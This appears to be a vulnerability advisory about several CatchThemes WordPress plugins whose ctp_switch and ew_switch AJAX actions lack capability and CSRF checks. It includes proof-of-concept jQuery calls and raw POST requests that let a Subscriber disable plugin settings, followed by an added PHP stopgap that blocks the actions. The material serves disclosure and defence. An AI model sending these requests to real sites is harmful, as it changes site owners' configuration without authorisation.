wpexploit | Apple502j | WPEX-ID:181A729E-FFFE-457C-9E8D-A4343FD2E630 | Sep 20, 2021 - 12:00 a.m.

Multiple Plugins from CatchThemes - Unauthorised Plugin's Setting Change


EPSS: 0.001 (Percentile: 21.2%)

Multiple plugins from the CatchThemes vendor do not perform capability and CSRF checks in the ctp_switch AJAX action, which could allow any authenticated user, such as a Subscriber, to change the plugin’s configuration.

1) Turn off "Turn On Catch Themes & Catch Plugin tabs"

jQuery.post(ajaxurl,{
action:"ctp_switch",
option_name:"theme_plugin_tabs",
value:"false"
})

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 59
Connection: close
Cookie: [subscriber+]

action=ctp_switch&option_name=theme_plugin_tabs&value=false

2) Turn off "EW: Authors"

jQuery.post(ajaxurl,{
action:"ew_switch",
option_name:"ew_authors",
value:"false"
})

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 51
Connection: close
Cookie: [subscriber+]

action=ew_switch&option_name=ew_authors&value=false
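
A stopgap for sites that cannot update the affected plugins yet, as an added example that is not code from CatchThemes or from the original advisory: a must-use plugin that applies the two missing checks before the plugin's own handler runs. It assumes the plugins register their handlers on wp_ajax_ctp_switch and wp_ajax_ew_switch at a priority above 0 and that manage_options is the appropriate capability; the example_ names are hypothetical.

```php
<?php
/**
 * Plugin Name: Guard for ctp_switch / ew_switch AJAX actions (added example)
 * Description: Place in wp-content/mu-plugins/. Not CatchThemes code.
 */
defined( 'ABSPATH' ) || exit;

// Action names taken from the two requests shown in the advisory.
const EXAMPLE_GUARDED_ACTIONS = array( 'ctp_switch', 'ew_switch' );

/**
 * Reject the request unless it comes from an administrator and from this site.
 * wp_send_json_error() ends the request, so the later handler never runs.
 */
function example_guard_switch_action() {
	// Capability check: Subscribers and other low-privilege roles stop here.
	if ( ! current_user_can( 'manage_options' ) ) {
		wp_send_json_error( 'forbidden', 403 );
	}

	// Stopgap CSRF check. An unpatched plugin sends no nonce that
	// check_ajax_referer() could verify, so compare the Origin (or Referer)
	// host with the admin host instead.
	$source = '';
	if ( ! empty( $_SERVER['HTTP_ORIGIN'] ) ) {
		$source = wp_unslash( $_SERVER['HTTP_ORIGIN'] );
	} elseif ( wp_get_raw_referer() ) {
		$source = wp_get_raw_referer();
	}

	$source_host = $source ? wp_parse_url( $source, PHP_URL_HOST ) : null;
	$admin_host  = wp_parse_url( admin_url(), PHP_URL_HOST );

	if ( ! $source_host || 0 !== strcasecmp( $source_host, $admin_host ) ) {
		wp_send_json_error( 'cross-site request rejected', 403 );
	}
}

foreach ( EXAMPLE_GUARDED_ACTIONS as $example_action ) {
	// Priority 0 runs before handlers registered at the default priority 10.
	add_action( 'wp_ajax_' . $example_action, 'example_guard_switch_action', 0 );
}
```

The host comparison is weaker than a nonce and is only meant to hold until the plugins are updated to a version that performs both checks itself.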
